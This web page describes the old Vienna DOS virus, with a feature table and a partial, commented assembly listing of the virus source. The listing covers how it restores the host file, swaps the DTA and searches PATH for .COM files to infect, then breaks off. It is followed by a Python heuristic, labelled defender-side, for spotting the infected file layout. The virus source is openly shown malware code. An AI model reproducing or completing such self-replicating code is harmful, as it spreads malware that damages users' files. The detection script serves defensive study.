Here is a short description of what the VIENNA-virus does:

Column key:
  A  Infects Fixed Disk Partition Table
  9  Infects Fixed Disk Boot Sector
  8  Infects Floppy Diskette Boot
  7  Infects Overlay Files
  6  Infects EXE Files
  5  Infects COM files
  4  Infects COMMAND.COM
  3  Virus Installs Self in Memory
  2  Virus Uses Self-Encryption
  1  Virus Uses STEALTH Techniques

                                                   Increase in
                                                   Infected
                                                   Program's
Virus                        1 2 3 4 5 6 7 8 9 A   Size          Damage
-----------------------------------------------------------------------------
1014 [Vienna]                . . x x x . . . . .   1014          O P L
Christmas Violator [Vienna]  . . . x x . . . . .   5302          O P D
Violator (5) [Vienna]        . . . x x . . . . .   1055          O P D

LEGEND:

The Vienna-Virus Source-code:

;******************************************************************************
MOV_CX  MACRO   X
        DB      0B9H
        DW      X
ENDM

CODE    SEGMENT
        ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
        ORG     $+0100H

;*****************************************************************************
;Start out with a JMP around the remains of the original .COM file, into the
;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS.
;The rest of the file (first 3 bytes) are stored in the virus data area.
;*****************************************************************************
VCODE:  JMP     virus

;This was the rest of the original .COM file. Tiny and simple, this time
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP

;************************************************************
; The actual virus starts here
;************************************************************
v_start equ     $

virus:  PUSH    CX
        MOV     DX,OFFSET vir_dat       ;This is where the virus data starts.
                                        ; The 2nd and 3rd bytes get modified.
        CLD                             ;Pointers will be auto INcremented
        MOV     SI,DX                   ;Access data as offset from SI
        ADD     SI,first_3              ;Point to original 1st 3 bytes of .COM
        MOV     DI,OFFSET 100H          ;`cause all .COM files start at 100H
        MOV     CX,3
        REPZ    MOVSB                   ;Restore original first 3 bytes of .COM
        MOV     SI,DX                   ;Keep SI pointing to the data area

;*************************************************************
; Check the DOS version
;*************************************************************
        MOV     AH,30H
        INT     21H
        CMP     AL,0                    ;0 means it's version 1.X
        JNZ     dos_ok                  ;For version 2.0 or greater
        JMP     quit                    ;Don't try to infect version 1.X

;*************************************************************
; Here if the DOS version is high enough for this to work
;*************************************************************
dos_ok: PUSH    ES

;*************************************************************
; Get DTA address into ES:BX
;*************************************************************
        MOV     AH,2FH
        INT     21H

;*************************************************************
; Save the DTA address
;*************************************************************
        MOV     [SI+old_dta],BX
        MOV     [SI+old_dts],ES         ;Save the DTA address
        POP     ES

;*************************************************************
; Set DTA to point inside the virus data area
;*************************************************************
        MOV     DX,dta                  ;Offset of new DTA in virus data area
;       NOP                             ;MASM will add this NOP here
        ADD     DX,SI                   ;Compute DTA address
        MOV     AH,1AH
        INT     21H                     ;Set new DTA to inside our own code
        PUSH    ES
        PUSH    SI
        MOV     ES,DS:2CH
        MOV     DI,0                    ;ES:DI points to environment

;************************************************************
; Find the "PATH=" string in the environment
;************************************************************
find_path:
        POP     SI
        PUSH    SI                      ;Get SI back
        ADD     SI,env_str              ;Point to "PATH=" string in data area
        LODSB
        MOV     CX,OFFSET 8000H         ;Environment can be 32768 bytes long
        REPNZ   SCASB                   ;Search for first character
        MOV     CX,4

;************************************************************
; Loop to check for the next four characters
;************************************************************
check_next_4:
        LODSB
        SCASB
        JNZ     find_path               ;If not all there, abort & start over
        LOOP    check_next_4            ;Loop to check the next character
        POP     SI
        POP     ES
        MOV     [SI+path_ad],DI         ;Save the address of the PATH
        MOV     DI,SI
        ADD     DI,wrk_spc              ;File name workspace
        MOV     BX,SI                   ;Save a copy of SI
        ADD     SI,wrk_spc              ;Point SI to workspace
        MOV     DI,SI                   ;Point DI to workspace
        JMP     SHORT slash_ok

;**********************************************************
; Look in the PATH for more subdirectories, if any
;**********************************************************
set_subdir:
        CMP     WORD PTR [SI+path_ad],0 ;Is PATH string ended?
        JNZ     found_subdir            ;If not, there are more subdirectories
        JMP     all_done                ;Else, we're all done

;**********************************************************
; Here if there are more subdirectories in the path
;**********************************************************
found_subdir:
        PUSH    DS
        PUSH    SI
        MOV     DS,ES:2CH               ;DS points to environment segment
        MOV     DI,SI
        MOV     SI,ES:[DI+path_ad]      ;SI = PATH address
        ADD     DI,wrk_spc              ;DI points to file name workspace

;***********************************************************
; Move subdirectory name into file name workspace
;***********************************************************
move_subdir:
        LODSB                           ;Get character
        CMP     AL,';'                  ;Is it a ';' delimiter?
        JZ      moved_one               ;Yes, found another subdirectory
        CMP     AL,0                    ;End of PATH string?
        JZ      moved_last_one          ;Yes
        STOSB                           ;Save PATH marker into [DI]
        JMP     SHORT move_subdir

;******************************************************************
; Mark the fact that we're looking through the final subdirectory
;******************************************************************
moved_last_one:
        MOV     SI,0

... and so on ...
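
A defender-side view of the layout described in the listing's opening comments (a .COM file patched to start with a JMP into code appended at its end), as an added example that is not part of the original page: the Python below checks a .COM image for a leading near JMP that lands in the file's tail on the entry instructions shown above (PUSH CX; MOV DX,imm16; CLD). The function names, the 6144-byte tail window and the sample byte strings are assumptions constructed for illustration; this is a layout heuristic, not a vetted antivirus signature.

```python
import struct

JMP_NEAR = 0xE9  # opcode of the 3-byte near JMP (E9 rel16)
# Encodings of the first entry instructions in the listing:
# PUSH CX (51), MOV DX,imm16 (BA lo hi), CLD (FC). None = wildcard byte.
ENTRY_PATTERN = (0x51, 0xBA, None, None, 0xFC)


def jump_target(image: bytes):
    """File offset that a leading near JMP lands on, or None."""
    if len(image) < 3 or image[0] != JMP_NEAR:
        return None
    (rel16,) = struct.unpack_from("<H", image, 1)
    # .COM images load at 0100h, so IP after the JMP is 0103h (16-bit wrap).
    target = ((0x103 + rel16) & 0xFFFF) - 0x100
    return target if 0 <= target < len(image) else None


def matches_entry(image: bytes, offset: int) -> bool:
    """True if the bytes at offset fit ENTRY_PATTERN (wildcards skipped)."""
    chunk = image[offset:offset + len(ENTRY_PATTERN)]
    return len(chunk) == len(ENTRY_PATTERN) and all(
        want is None or want == got for want, got in zip(ENTRY_PATTERN, chunk))


def classify_com(image: bytes, tail_window: int = 6144) -> str:
    """tail_window is an assumed bound chosen to cover the largest size
    increase in the table above (5302 bytes)."""
    target = jump_target(image)
    if target is None:
        return "no-leading-jmp"
    if len(image) - target > tail_window:
        return "jmp-elsewhere"
    return "entry-pattern-match" if matches_entry(image, target) else "jmp-to-tail"


# Constructed, non-functional byte strings (not real samples).
HOST_ONLY = b"\xCD\x20" + b"\x90" * 14                    # INT 20h + NOPs
PATCHED_LAYOUT = (b"\xE9\x0F\x00" + b"\x90" * 15          # JMP to offset 18
                  + b"\x51\xBA\x00\x00\xFC" + b"\x00" * 32)
BENIGN_JMP = b"\xE9\x0F\x00" + b"\x90" * 15 + b"\xB4\x4C\xCD\x21"

if __name__ == "__main__":
    for name in ("HOST_ONLY", "PATCHED_LAYOUT", "BENIGN_JMP"):
        print(name, classify_com(globals()[name]))
```

A "jmp-to-tail" result on its own is common in legitimate .COM programs, so only the combined result is worth escalating to a full scanner.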
The source of the virus Vienna was published in Russia. How the story began